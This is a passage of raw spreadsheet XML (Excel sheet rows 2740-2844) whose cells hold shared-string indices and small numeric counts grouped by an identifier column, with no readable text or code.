    <row r="2740" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2740" t="s">
        <v>16228</v>
      </c>
      <c r="B2740" t="s">
        <v>16217</v>
      </c>
      <c r="C2740">
        <v>2</v>
      </c>
      <c r="D2740">
        <v>2571</v>
      </c>
    </row>
    <row r="2741" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2741" t="s">
        <v>16231</v>
      </c>
      <c r="B2741" t="s">
        <v>16218</v>
      </c>
      <c r="C2741">
        <v>3</v>
      </c>
      <c r="D2741">
        <v>2571</v>
      </c>
    </row>
    <row r="2742" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2742" t="s">
        <v>16229</v>
      </c>
      <c r="B2742" t="s">
        <v>16219</v>
      </c>
      <c r="C2742">
        <v>1</v>
      </c>
      <c r="D2742">
        <v>2571</v>
      </c>
    </row>
    <row r="2743" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2743" t="s">
        <v>16230</v>
      </c>
      <c r="B2743" t="s">
        <v>16220</v>
      </c>
      <c r="C2743">
        <v>3</v>
      </c>
      <c r="D2743">
        <v>2571</v>
      </c>
    </row>
    <row r="2744" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2744" t="s">
        <v>16229</v>
      </c>
      <c r="B2744" t="s">
        <v>16221</v>
      </c>
      <c r="C2744">
        <v>15</v>
      </c>
      <c r="D2744">
        <v>2571</v>
      </c>
    </row>
    <row r="2745" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2745" t="s">
        <v>16230</v>
      </c>
      <c r="B2745" t="s">
        <v>16222</v>
      </c>
      <c r="C2745">
        <v>10</v>
      </c>
      <c r="D2745">
        <v>2571</v>
      </c>
    </row>
    <row r="2746" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2746" t="s">
        <v>16223</v>
      </c>
      <c r="B2746" t="s">
        <v>16223</v>
      </c>
      <c r="C2746">
        <v>6</v>
      </c>
      <c r="D2746">
        <v>2571</v>
      </c>
    </row>
    <row r="2747" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2747" t="s">
        <v>16224</v>
      </c>
      <c r="B2747" t="s">
        <v>16224</v>
      </c>
      <c r="C2747">
        <v>1</v>
      </c>
      <c r="D2747">
        <v>2571</v>
      </c>
    </row>
    <row r="2748" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2748" t="s">
        <v>16228</v>
      </c>
      <c r="B2748" t="s">
        <v>16211</v>
      </c>
      <c r="C2748">
        <v>0</v>
      </c>
      <c r="D2748">
        <v>2521</v>
      </c>
    </row>
    <row r="2749" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2749" t="s">
        <v>16231</v>
      </c>
      <c r="B2749" t="s">
        <v>16212</v>
      </c>
      <c r="C2749">
        <v>0</v>
      </c>
      <c r="D2749">
        <v>2521</v>
      </c>
    </row>
    <row r="2750" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2750" t="s">
        <v>16228</v>
      </c>
      <c r="B2750" t="s">
        <v>16213</v>
      </c>
      <c r="C2750">
        <v>0</v>
      </c>
      <c r="D2750">
        <v>2521</v>
      </c>
    </row>
    <row r="2751" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2751" t="s">
        <v>16231</v>
      </c>
      <c r="B2751" t="s">
        <v>16214</v>
      </c>
      <c r="C2751">
        <v>0</v>
      </c>
      <c r="D2751">
        <v>2521</v>
      </c>
    </row>
    <row r="2752" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2752" t="s">
        <v>16228</v>
      </c>
      <c r="B2752" t="s">
        <v>16215</v>
      </c>
      <c r="C2752">
        <v>0</v>
      </c>
      <c r="D2752">
        <v>2521</v>
      </c>
    </row>
    <row r="2753" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2753" t="s">
        <v>16231</v>
      </c>
      <c r="B2753" t="s">
        <v>16216</v>
      </c>
      <c r="C2753">
        <v>0</v>
      </c>
      <c r="D2753">
        <v>2521</v>
      </c>
    </row>
    <row r="2754" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2754" t="s">
        <v>16228</v>
      </c>
      <c r="B2754" t="s">
        <v>16217</v>
      </c>
      <c r="C2754">
        <v>0</v>
      </c>
      <c r="D2754">
        <v>2521</v>
      </c>
    </row>
    <row r="2755" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2755" t="s">
        <v>16231</v>
      </c>
      <c r="B2755" t="s">
        <v>16218</v>
      </c>
      <c r="C2755">
        <v>0</v>
      </c>
      <c r="D2755">
        <v>2521</v>
      </c>
    </row>
    <row r="2756" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2756" t="s">
        <v>16229</v>
      </c>
      <c r="B2756" t="s">
        <v>16219</v>
      </c>
      <c r="C2756">
        <v>1</v>
      </c>
      <c r="D2756">
        <v>2521</v>
      </c>
    </row>
    <row r="2757" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2757" t="s">
        <v>16230</v>
      </c>
      <c r="B2757" t="s">
        <v>16220</v>
      </c>
      <c r="C2757">
        <v>6</v>
      </c>
      <c r="D2757">
        <v>2521</v>
      </c>
    </row>
    <row r="2758" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2758" t="s">
        <v>16229</v>
      </c>
      <c r="B2758" t="s">
        <v>16221</v>
      </c>
      <c r="C2758">
        <v>27</v>
      </c>
      <c r="D2758">
        <v>2521</v>
      </c>
    </row>
    <row r="2759" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2759" t="s">
        <v>16230</v>
      </c>
      <c r="B2759" t="s">
        <v>16222</v>
      </c>
      <c r="C2759">
        <v>14</v>
      </c>
      <c r="D2759">
        <v>2521</v>
      </c>
    </row>
    <row r="2760" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2760" t="s">
        <v>16223</v>
      </c>
      <c r="B2760" t="s">
        <v>16223</v>
      </c>
      <c r="C2760">
        <v>26</v>
      </c>
      <c r="D2760">
        <v>2521</v>
      </c>
    </row>
    <row r="2761" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2761" t="s">
        <v>16224</v>
      </c>
      <c r="B2761" t="s">
        <v>16224</v>
      </c>
      <c r="C2761">
        <v>1</v>
      </c>
      <c r="D2761">
        <v>2521</v>
      </c>
    </row>
    <row r="2762" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2762" t="s">
        <v>16228</v>
      </c>
      <c r="B2762" t="s">
        <v>16211</v>
      </c>
      <c r="C2762">
        <v>0</v>
      </c>
      <c r="D2762">
        <v>215</v>
      </c>
    </row>
    <row r="2763" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2763" t="s">
        <v>16231</v>
      </c>
      <c r="B2763" t="s">
        <v>16212</v>
      </c>
      <c r="C2763">
        <v>0</v>
      </c>
      <c r="D2763">
        <v>215</v>
      </c>
    </row>
    <row r="2764" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2764" t="s">
        <v>16228</v>
      </c>
      <c r="B2764" t="s">
        <v>16213</v>
      </c>
      <c r="C2764">
        <v>0</v>
      </c>
      <c r="D2764">
        <v>215</v>
      </c>
    </row>
    <row r="2765" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2765" t="s">
        <v>16231</v>
      </c>
      <c r="B2765" t="s">
        <v>16214</v>
      </c>
      <c r="C2765">
        <v>0</v>
      </c>
      <c r="D2765">
        <v>215</v>
      </c>
    </row>
    <row r="2766" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2766" t="s">
        <v>16228</v>
      </c>
      <c r="B2766" t="s">
        <v>16215</v>
      </c>
      <c r="C2766">
        <v>1</v>
      </c>
      <c r="D2766">
        <v>215</v>
      </c>
    </row>
    <row r="2767" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2767" t="s">
        <v>16231</v>
      </c>
      <c r="B2767" t="s">
        <v>16216</v>
      </c>
      <c r="C2767">
        <v>1</v>
      </c>
      <c r="D2767">
        <v>215</v>
      </c>
    </row>
    <row r="2768" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2768" t="s">
        <v>16228</v>
      </c>
      <c r="B2768" t="s">
        <v>16217</v>
      </c>
      <c r="C2768">
        <v>8</v>
      </c>
      <c r="D2768">
        <v>215</v>
      </c>
    </row>
    <row r="2769" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2769" t="s">
        <v>16231</v>
      </c>
      <c r="B2769" t="s">
        <v>16218</v>
      </c>
      <c r="C2769">
        <v>0</v>
      </c>
      <c r="D2769">
        <v>215</v>
      </c>
    </row>
    <row r="2770" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2770" t="s">
        <v>16229</v>
      </c>
      <c r="B2770" t="s">
        <v>16219</v>
      </c>
      <c r="C2770">
        <v>0</v>
      </c>
      <c r="D2770">
        <v>215</v>
      </c>
    </row>
    <row r="2771" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2771" t="s">
        <v>16230</v>
      </c>
      <c r="B2771" t="s">
        <v>16220</v>
      </c>
      <c r="C2771">
        <v>0</v>
      </c>
      <c r="D2771">
        <v>215</v>
      </c>
    </row>
    <row r="2772" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2772" t="s">
        <v>16229</v>
      </c>
      <c r="B2772" t="s">
        <v>16221</v>
      </c>
      <c r="C2772">
        <v>2</v>
      </c>
      <c r="D2772">
        <v>215</v>
      </c>
    </row>
    <row r="2773" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2773" t="s">
        <v>16230</v>
      </c>
      <c r="B2773" t="s">
        <v>16222</v>
      </c>
      <c r="C2773">
        <v>0</v>
      </c>
      <c r="D2773">
        <v>215</v>
      </c>
    </row>
    <row r="2774" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2774" t="s">
        <v>16223</v>
      </c>
      <c r="B2774" t="s">
        <v>16223</v>
      </c>
      <c r="C2774">
        <v>12</v>
      </c>
      <c r="D2774">
        <v>215</v>
      </c>
    </row>
    <row r="2775" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2775" t="s">
        <v>16224</v>
      </c>
      <c r="B2775" t="s">
        <v>16224</v>
      </c>
      <c r="C2775">
        <v>2</v>
      </c>
      <c r="D2775">
        <v>215</v>
      </c>
    </row>
    <row r="2776" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2776" t="s">
        <v>16228</v>
      </c>
      <c r="B2776" t="s">
        <v>16211</v>
      </c>
      <c r="C2776">
        <v>0</v>
      </c>
      <c r="D2776">
        <v>1337</v>
      </c>
    </row>
    <row r="2777" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2777" t="s">
        <v>16231</v>
      </c>
      <c r="B2777" t="s">
        <v>16212</v>
      </c>
      <c r="C2777">
        <v>0</v>
      </c>
      <c r="D2777">
        <v>1337</v>
      </c>
    </row>
    <row r="2778" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2778" t="s">
        <v>16228</v>
      </c>
      <c r="B2778" t="s">
        <v>16213</v>
      </c>
      <c r="C2778">
        <v>0</v>
      </c>
      <c r="D2778">
        <v>1337</v>
      </c>
    </row>
    <row r="2779" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2779" t="s">
        <v>16231</v>
      </c>
      <c r="B2779" t="s">
        <v>16214</v>
      </c>
      <c r="C2779">
        <v>0</v>
      </c>
      <c r="D2779">
        <v>1337</v>
      </c>
    </row>
    <row r="2780" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2780" t="s">
        <v>16228</v>
      </c>
      <c r="B2780" t="s">
        <v>16215</v>
      </c>
      <c r="C2780">
        <v>1</v>
      </c>
      <c r="D2780">
        <v>1337</v>
      </c>
    </row>
    <row r="2781" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2781" t="s">
        <v>16231</v>
      </c>
      <c r="B2781" t="s">
        <v>16216</v>
      </c>
      <c r="C2781">
        <v>3</v>
      </c>
      <c r="D2781">
        <v>1337</v>
      </c>
    </row>
    <row r="2782" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2782" t="s">
        <v>16228</v>
      </c>
      <c r="B2782" t="s">
        <v>16217</v>
      </c>
      <c r="C2782">
        <v>42</v>
      </c>
      <c r="D2782">
        <v>1337</v>
      </c>
    </row>
    <row r="2783" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2783" t="s">
        <v>16231</v>
      </c>
      <c r="B2783" t="s">
        <v>16218</v>
      </c>
      <c r="C2783">
        <v>22</v>
      </c>
      <c r="D2783">
        <v>1337</v>
      </c>
    </row>
    <row r="2784" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2784" t="s">
        <v>16229</v>
      </c>
      <c r="B2784" t="s">
        <v>16219</v>
      </c>
      <c r="C2784">
        <v>0</v>
      </c>
      <c r="D2784">
        <v>1337</v>
      </c>
    </row>
    <row r="2785" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2785" t="s">
        <v>16230</v>
      </c>
      <c r="B2785" t="s">
        <v>16220</v>
      </c>
      <c r="C2785">
        <v>0</v>
      </c>
      <c r="D2785">
        <v>1337</v>
      </c>
    </row>
    <row r="2786" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2786" t="s">
        <v>16229</v>
      </c>
      <c r="B2786" t="s">
        <v>16221</v>
      </c>
      <c r="C2786">
        <v>0</v>
      </c>
      <c r="D2786">
        <v>1337</v>
      </c>
    </row>
    <row r="2787" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2787" t="s">
        <v>16230</v>
      </c>
      <c r="B2787" t="s">
        <v>16222</v>
      </c>
      <c r="C2787">
        <v>0</v>
      </c>
      <c r="D2787">
        <v>1337</v>
      </c>
    </row>
    <row r="2788" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2788" t="s">
        <v>16223</v>
      </c>
      <c r="B2788" t="s">
        <v>16223</v>
      </c>
      <c r="C2788">
        <v>25</v>
      </c>
      <c r="D2788">
        <v>1337</v>
      </c>
    </row>
    <row r="2789" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2789" t="s">
        <v>16224</v>
      </c>
      <c r="B2789" t="s">
        <v>16224</v>
      </c>
      <c r="C2789">
        <v>0</v>
      </c>
      <c r="D2789">
        <v>1337</v>
      </c>
    </row>
    <row r="2790" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2790" t="s">
        <v>16228</v>
      </c>
      <c r="B2790" t="s">
        <v>16211</v>
      </c>
      <c r="C2790">
        <v>1</v>
      </c>
      <c r="D2790">
        <v>985</v>
      </c>
    </row>
    <row r="2791" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2791" t="s">
        <v>16231</v>
      </c>
      <c r="B2791" t="s">
        <v>16212</v>
      </c>
      <c r="C2791">
        <v>2</v>
      </c>
      <c r="D2791">
        <v>985</v>
      </c>
    </row>
    <row r="2792" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2792" t="s">
        <v>16228</v>
      </c>
      <c r="B2792" t="s">
        <v>16213</v>
      </c>
      <c r="C2792">
        <v>7</v>
      </c>
      <c r="D2792">
        <v>985</v>
      </c>
    </row>
    <row r="2793" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2793" t="s">
        <v>16231</v>
      </c>
      <c r="B2793" t="s">
        <v>16214</v>
      </c>
      <c r="C2793">
        <v>1</v>
      </c>
      <c r="D2793">
        <v>985</v>
      </c>
    </row>
    <row r="2794" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2794" t="s">
        <v>16228</v>
      </c>
      <c r="B2794" t="s">
        <v>16215</v>
      </c>
      <c r="C2794">
        <v>1</v>
      </c>
      <c r="D2794">
        <v>985</v>
      </c>
    </row>
    <row r="2795" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2795" t="s">
        <v>16231</v>
      </c>
      <c r="B2795" t="s">
        <v>16216</v>
      </c>
      <c r="C2795">
        <v>2</v>
      </c>
      <c r="D2795">
        <v>985</v>
      </c>
    </row>
    <row r="2796" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2796" t="s">
        <v>16228</v>
      </c>
      <c r="B2796" t="s">
        <v>16217</v>
      </c>
      <c r="C2796">
        <v>0</v>
      </c>
      <c r="D2796">
        <v>985</v>
      </c>
    </row>
    <row r="2797" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2797" t="s">
        <v>16231</v>
      </c>
      <c r="B2797" t="s">
        <v>16218</v>
      </c>
      <c r="C2797">
        <v>0</v>
      </c>
      <c r="D2797">
        <v>985</v>
      </c>
    </row>
    <row r="2798" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2798" t="s">
        <v>16229</v>
      </c>
      <c r="B2798" t="s">
        <v>16219</v>
      </c>
      <c r="C2798">
        <v>0</v>
      </c>
      <c r="D2798">
        <v>985</v>
      </c>
    </row>
    <row r="2799" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2799" t="s">
        <v>16230</v>
      </c>
      <c r="B2799" t="s">
        <v>16220</v>
      </c>
      <c r="C2799">
        <v>0</v>
      </c>
      <c r="D2799">
        <v>985</v>
      </c>
    </row>
    <row r="2800" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2800" t="s">
        <v>16229</v>
      </c>
      <c r="B2800" t="s">
        <v>16221</v>
      </c>
      <c r="C2800">
        <v>0</v>
      </c>
      <c r="D2800">
        <v>985</v>
      </c>
    </row>
    <row r="2801" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2801" t="s">
        <v>16230</v>
      </c>
      <c r="B2801" t="s">
        <v>16222</v>
      </c>
      <c r="C2801">
        <v>0</v>
      </c>
      <c r="D2801">
        <v>985</v>
      </c>
    </row>
    <row r="2802" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2802" t="s">
        <v>16223</v>
      </c>
      <c r="B2802" t="s">
        <v>16223</v>
      </c>
      <c r="C2802">
        <v>25</v>
      </c>
      <c r="D2802">
        <v>985</v>
      </c>
    </row>
    <row r="2803" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2803" t="s">
        <v>16224</v>
      </c>
      <c r="B2803" t="s">
        <v>16224</v>
      </c>
      <c r="C2803">
        <v>1</v>
      </c>
      <c r="D2803">
        <v>985</v>
      </c>
    </row>
    <row r="2804" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2804" t="s">
        <v>16228</v>
      </c>
      <c r="B2804" t="s">
        <v>16211</v>
      </c>
      <c r="C2804">
        <v>0</v>
      </c>
      <c r="D2804">
        <v>1028</v>
      </c>
    </row>
    <row r="2805" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2805" t="s">
        <v>16231</v>
      </c>
      <c r="B2805" t="s">
        <v>16212</v>
      </c>
      <c r="C2805">
        <v>0</v>
      </c>
      <c r="D2805">
        <v>1028</v>
      </c>
    </row>
    <row r="2806" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2806" t="s">
        <v>16228</v>
      </c>
      <c r="B2806" t="s">
        <v>16213</v>
      </c>
      <c r="C2806">
        <v>0</v>
      </c>
      <c r="D2806">
        <v>1028</v>
      </c>
    </row>
    <row r="2807" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2807" t="s">
        <v>16231</v>
      </c>
      <c r="B2807" t="s">
        <v>16214</v>
      </c>
      <c r="C2807">
        <v>0</v>
      </c>
      <c r="D2807">
        <v>1028</v>
      </c>
    </row>
    <row r="2808" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2808" t="s">
        <v>16228</v>
      </c>
      <c r="B2808" t="s">
        <v>16215</v>
      </c>
      <c r="C2808">
        <v>11</v>
      </c>
      <c r="D2808">
        <v>1028</v>
      </c>
    </row>
    <row r="2809" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2809" t="s">
        <v>16231</v>
      </c>
      <c r="B2809" t="s">
        <v>16216</v>
      </c>
      <c r="C2809">
        <v>6</v>
      </c>
      <c r="D2809">
        <v>1028</v>
      </c>
    </row>
    <row r="2810" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2810" t="s">
        <v>16228</v>
      </c>
      <c r="B2810" t="s">
        <v>16217</v>
      </c>
      <c r="C2810">
        <v>30</v>
      </c>
      <c r="D2810">
        <v>1028</v>
      </c>
    </row>
    <row r="2811" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2811" t="s">
        <v>16231</v>
      </c>
      <c r="B2811" t="s">
        <v>16218</v>
      </c>
      <c r="C2811">
        <v>9</v>
      </c>
      <c r="D2811">
        <v>1028</v>
      </c>
    </row>
    <row r="2812" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2812" t="s">
        <v>16229</v>
      </c>
      <c r="B2812" t="s">
        <v>16219</v>
      </c>
      <c r="C2812">
        <v>0</v>
      </c>
      <c r="D2812">
        <v>1028</v>
      </c>
    </row>
    <row r="2813" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2813" t="s">
        <v>16230</v>
      </c>
      <c r="B2813" t="s">
        <v>16220</v>
      </c>
      <c r="C2813">
        <v>0</v>
      </c>
      <c r="D2813">
        <v>1028</v>
      </c>
    </row>
    <row r="2814" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2814" t="s">
        <v>16229</v>
      </c>
      <c r="B2814" t="s">
        <v>16221</v>
      </c>
      <c r="C2814">
        <v>78</v>
      </c>
      <c r="D2814">
        <v>1028</v>
      </c>
    </row>
    <row r="2815" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2815" t="s">
        <v>16230</v>
      </c>
      <c r="B2815" t="s">
        <v>16222</v>
      </c>
      <c r="C2815">
        <v>15</v>
      </c>
      <c r="D2815">
        <v>1028</v>
      </c>
    </row>
    <row r="2816" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2816" t="s">
        <v>16223</v>
      </c>
      <c r="B2816" t="s">
        <v>16223</v>
      </c>
      <c r="C2816">
        <v>26</v>
      </c>
      <c r="D2816">
        <v>1028</v>
      </c>
    </row>
    <row r="2817" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2817" t="s">
        <v>16224</v>
      </c>
      <c r="B2817" t="s">
        <v>16224</v>
      </c>
      <c r="C2817">
        <v>0</v>
      </c>
      <c r="D2817">
        <v>1028</v>
      </c>
    </row>
    <row r="2818" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2818" t="s">
        <v>16228</v>
      </c>
      <c r="B2818" t="s">
        <v>16217</v>
      </c>
      <c r="C2818">
        <v>41</v>
      </c>
      <c r="D2818">
        <v>1337</v>
      </c>
    </row>
    <row r="2819" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2819" t="s">
        <v>16229</v>
      </c>
      <c r="B2819" t="s">
        <v>16221</v>
      </c>
      <c r="C2819">
        <v>2</v>
      </c>
      <c r="D2819">
        <v>2362</v>
      </c>
    </row>
    <row r="2820" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2820" t="s">
        <v>16230</v>
      </c>
      <c r="B2820" t="s">
        <v>16222</v>
      </c>
      <c r="C2820">
        <v>21</v>
      </c>
      <c r="D2820">
        <v>2362</v>
      </c>
    </row>
    <row r="2821" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2821" t="s">
        <v>16228</v>
      </c>
      <c r="B2821" t="s">
        <v>16211</v>
      </c>
      <c r="C2821">
        <v>0</v>
      </c>
      <c r="D2821">
        <v>2358</v>
      </c>
    </row>
    <row r="2822" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2822" t="s">
        <v>16231</v>
      </c>
      <c r="B2822" t="s">
        <v>16212</v>
      </c>
      <c r="C2822">
        <v>0</v>
      </c>
      <c r="D2822">
        <v>2358</v>
      </c>
    </row>
    <row r="2823" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2823" t="s">
        <v>16228</v>
      </c>
      <c r="B2823" t="s">
        <v>16213</v>
      </c>
      <c r="C2823">
        <v>0</v>
      </c>
      <c r="D2823">
        <v>2358</v>
      </c>
    </row>
    <row r="2824" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2824" t="s">
        <v>16231</v>
      </c>
      <c r="B2824" t="s">
        <v>16214</v>
      </c>
      <c r="C2824">
        <v>0</v>
      </c>
      <c r="D2824">
        <v>2358</v>
      </c>
    </row>
    <row r="2825" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2825" t="s">
        <v>16228</v>
      </c>
      <c r="B2825" t="s">
        <v>16215</v>
      </c>
      <c r="C2825">
        <v>1</v>
      </c>
      <c r="D2825">
        <v>2358</v>
      </c>
    </row>
    <row r="2826" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2826" t="s">
        <v>16231</v>
      </c>
      <c r="B2826" t="s">
        <v>16216</v>
      </c>
      <c r="C2826">
        <v>0</v>
      </c>
      <c r="D2826">
        <v>2358</v>
      </c>
    </row>
    <row r="2827" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2827" t="s">
        <v>16228</v>
      </c>
      <c r="B2827" t="s">
        <v>16217</v>
      </c>
      <c r="C2827">
        <v>0</v>
      </c>
      <c r="D2827">
        <v>2358</v>
      </c>
    </row>
    <row r="2828" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2828" t="s">
        <v>16231</v>
      </c>
      <c r="B2828" t="s">
        <v>16218</v>
      </c>
      <c r="C2828">
        <v>0</v>
      </c>
      <c r="D2828">
        <v>2358</v>
      </c>
    </row>
    <row r="2829" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2829" t="s">
        <v>16229</v>
      </c>
      <c r="B2829" t="s">
        <v>16219</v>
      </c>
      <c r="C2829">
        <v>0</v>
      </c>
      <c r="D2829">
        <v>2358</v>
      </c>
    </row>
    <row r="2830" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2830" t="s">
        <v>16230</v>
      </c>
      <c r="B2830" t="s">
        <v>16220</v>
      </c>
      <c r="C2830">
        <v>0</v>
      </c>
      <c r="D2830">
        <v>2358</v>
      </c>
    </row>
    <row r="2831" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2831" t="s">
        <v>16229</v>
      </c>
      <c r="B2831" t="s">
        <v>16221</v>
      </c>
      <c r="C2831">
        <v>6</v>
      </c>
      <c r="D2831">
        <v>2358</v>
      </c>
    </row>
    <row r="2832" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2832" t="s">
        <v>16230</v>
      </c>
      <c r="B2832" t="s">
        <v>16222</v>
      </c>
      <c r="C2832">
        <v>2</v>
      </c>
      <c r="D2832">
        <v>2358</v>
      </c>
    </row>
    <row r="2833" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2833" t="s">
        <v>16223</v>
      </c>
      <c r="B2833" t="s">
        <v>16223</v>
      </c>
      <c r="C2833">
        <v>20</v>
      </c>
      <c r="D2833">
        <v>2358</v>
      </c>
    </row>
    <row r="2834" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2834" t="s">
        <v>16224</v>
      </c>
      <c r="B2834" t="s">
        <v>16224</v>
      </c>
      <c r="C2834">
        <v>0</v>
      </c>
      <c r="D2834">
        <v>2358</v>
      </c>
    </row>
    <row r="2835" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2835" t="s">
        <v>16228</v>
      </c>
      <c r="B2835" t="s">
        <v>16211</v>
      </c>
      <c r="C2835">
        <v>0</v>
      </c>
      <c r="D2835">
        <v>2016</v>
      </c>
    </row>
    <row r="2836" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2836" t="s">
        <v>16231</v>
      </c>
      <c r="B2836" t="s">
        <v>16212</v>
      </c>
      <c r="C2836">
        <v>0</v>
      </c>
      <c r="D2836">
        <v>2016</v>
      </c>
    </row>
    <row r="2837" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2837" t="s">
        <v>16228</v>
      </c>
      <c r="B2837" t="s">
        <v>16213</v>
      </c>
      <c r="C2837">
        <v>0</v>
      </c>
      <c r="D2837">
        <v>2016</v>
      </c>
    </row>
    <row r="2838" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2838" t="s">
        <v>16231</v>
      </c>
      <c r="B2838" t="s">
        <v>16214</v>
      </c>
      <c r="C2838">
        <v>0</v>
      </c>
      <c r="D2838">
        <v>2016</v>
      </c>
    </row>
    <row r="2839" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2839" t="s">
        <v>16228</v>
      </c>
      <c r="B2839" t="s">
        <v>16215</v>
      </c>
      <c r="C2839">
        <v>1</v>
      </c>
      <c r="D2839">
        <v>2016</v>
      </c>
    </row>
    <row r="2840" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2840" t="s">
        <v>16231</v>
      </c>
      <c r="B2840" t="s">
        <v>16216</v>
      </c>
      <c r="C2840">
        <v>2</v>
      </c>
      <c r="D2840">
        <v>2016</v>
      </c>
    </row>
    <row r="2841" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2841" t="s">
        <v>16228</v>
      </c>
      <c r="B2841" t="s">
        <v>16217</v>
      </c>
      <c r="C2841">
        <v>6</v>
      </c>
      <c r="D2841">
        <v>2016</v>
      </c>
    </row>
    <row r="2842" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2842" t="s">
        <v>16231</v>
      </c>
      <c r="B2842" t="s">
        <v>16218</v>
      </c>
      <c r="C2842">
        <v>10</v>
      </c>
      <c r="D2842">
        <v>2016</v>
      </c>
    </row>
    <row r="2843" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2843" t="s">
        <v>16229</v>
      </c>
      <c r="B2843" t="s">
        <v>16219</v>
      </c>
      <c r="C2843">
        <v>0</v>
      </c>
      <c r="D2843">
        <v>2016</v>
      </c>
    </row>
    <row r="2844" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2844" t="s">
        <v>16230</v>
      </c>
      <c r="B2844" t="s">
        <v>16220</v>
      </c>
      <c r="C2844">
        <v>2</v>
      </c>
      <c r="D2844">
        <v>2016</v>
      </c>
    </row>
